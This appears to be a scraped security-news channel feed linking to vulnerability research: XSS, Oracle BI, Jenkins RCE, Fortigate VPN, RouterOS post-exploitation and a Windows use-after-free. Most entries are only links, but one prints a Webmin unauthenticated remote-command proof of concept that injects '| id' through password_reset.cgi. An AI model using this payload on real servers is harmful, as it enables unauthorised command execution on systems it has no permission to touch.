Сookie-based XSS exploitation | $2300 Bug Bounty story
https://medium.com/@iSecMax/%D1%81ookie-based-xss-exploitation-2300-bug-bounty-story-9bc532ffa564
https://medium.com/@iSecMax/%D1%81ookie-based-xss-exploitation-2300-bug-bounty-story-9bc532ffa564
Medium
Сookie-based XSS exploitation | $2300 Bug Bounty story
For quite a long time I have been hunting for vulnerabilities on the HackerOne platform, allocating a certain amount of time outside the…
Multiple vulnerabilities in Oracle Business Intelligence, admin session bypass trick
https://github.com/vah13/Oracle-BI-bugs#cve-2019-2768
https://github.com/vah13/Oracle-BI-bugs#cve-2019-2768
GitHub
GitHub - vah13/Oracle-BI-bugs
Contribute to vah13/Oracle-BI-bugs development by creating an account on GitHub.
Payload to create a new user with Admin role exploiting Jenkins Metaprogramming RCE
https://gist.github.com/akhil-reni/e2116cc243af096ca3416168f49b3298
https://gist.github.com/akhil-reni/e2116cc243af096ca3416168f49b3298
Gist
Jenkins Metaprogramming RCE Create new user
Jenkins Metaprogramming RCE Create new user . GitHub Gist: instantly share code, notes, and snippets.
Forwarded from امنیت اطلاعات
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
Orange
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
This is 🍊 speaking
Forwarded from امنیت اطلاعات
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
RouterOS Post Exploitation
a tool to help enable and maintain root shell access in RouterOS 3.x through the current release.
https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
@sec_nerd_en
a tool to help enable and maintain root shell access in RouterOS 3.x through the current release.
https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
@sec_nerd_en
Medium
RouterOS Post Exploitation
Shared Objects, RC Scripts, and a Symlink
Instagram Explorer tool: Find images by date on Instagram at particular locations,
#OSINT
https://buff.ly/2LoeQR2
#OSINT
https://buff.ly/2LoeQR2
OSINT Combine
Instagram Explorer | OSINT Combine
Release out-of-tree v1.0.0 ― kernel {module, exploit} development tool
https://github.com/jollheef/out-of-tree/releases/tag/v1.0.0
https://github.com/jollheef/out-of-tree/releases/tag/v1.0.0
GitHub
jollheef/out-of-tree
out-of-tree kernel {module, exploit} development tool - jollheef/out-of-tree
Windows 10 x64 1903 • 10.0.18362.113 (WinBuild.160101.0800) • Use After Free
https://cpr-zero.checkpoint.com/vulns/cprid-2132/
https://cpr-zero.checkpoint.com/vulns/cprid-2132/
CPR-Zero
CPR-Zero: CVE-2019-1159
Check Point Research Vulnerability Repository